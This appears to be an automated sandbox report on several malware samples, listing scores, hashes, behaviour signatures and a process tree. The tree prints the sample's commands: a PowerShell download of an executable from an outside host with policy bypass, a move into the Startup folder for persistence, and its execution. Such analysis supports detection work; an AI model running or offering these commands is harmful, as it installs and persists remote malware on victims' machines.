Overview

Static analysis score: 10

Sample               Platform             Score
07fb7b42fe...35.exe  windows7-x64         10
07fb7b42fe...35.exe  windows10-2004-x64   1
4fa565cc2e...af.exe  windows7-x64         8
4fa565cc2e...af.exe  windows10-2004-x64   1
949c262359...70.ps1  windows7-x64         3
949c262359...70.ps1  windows10-2004-x64   3
b3b66f7e70...62.exe  windows7-x64         3
b3b66f7e70...62.exe  windows10-2004-x64   10
Analysis (score 10)

max time kernel:   118s
max time network:  118s
platform:          windows7_x64
resource:          win7-20240903-en
resource tags:     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted:         26/12/2024, 17:54
Behavioral tasks

Task         Sample                                                                  Resource
behavioral1  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  win7-20240903-en
behavioral2  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  win10v2004-20241007-en
behavioral3  4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe  win7-20241010-en
behavioral4  4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe  win10v2004-20241007-en
behavioral5  949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1  win7-20240903-en
behavioral6  949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1  win10v2004-20241007-en
behavioral7  b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe  win7-20240903-en
behavioral8  b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe  win10v2004-20241007-en
General

Target:  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Size:    131KB
MD5:     17eb8fa4b86a2f5ec5cb789545902181
SHA1:    cb40cc63b23bc335aa095606c07b56f2d2d71bb9
SHA256:  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235
SHA512:  cce3789d6e5395f701c9ff10467c3352568f7a3cea13cfd55e6b6f1bade8f01a56a8c1a433940fa1ccdce201941788717f6d486cef40f59d2bac075eaf696573
SSDEEP:  1536:j/tSikO5ssRyJmapXRQVO6eWkYolZPt1AUvMFMQiNwRVRky3es:xSWqLQAYolZPt1oJRfky3es
Malware Config
Signatures

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 3000, process powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 3000, process powershell.exe

- Suspicious use of WriteProcessMemory (15 IoCs; each of the five rows below is reported three times)
  description                       pid   Process                                                                 procid_target
  PID 2776 wrote to memory of 3004  2776  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  31
  PID 3004 wrote to memory of 3000  3004  cmd.exe                                                                 32
  PID 2776 wrote to memory of 2572  2776  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  33
  PID 2776 wrote to memory of 1528  2776  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  34
  PID 2776 wrote to memory of 2692  2776  07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe  35
Processes

Process tree (depth 1 = initial sample; each child is indented under its parent):

1  C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"
   PID: 2776
   - Suspicious use of WriteProcessMemory

   2  C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe
      PID: 3004
      - Suspicious use of WriteProcessMemory

      3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe
         PID: 3000
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

   2  C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c move x.exe "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/"
      PID: 2572

   2  C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c cls
      PID: 1528

   2  C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c cd "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/" && x.exe
      PID: 2692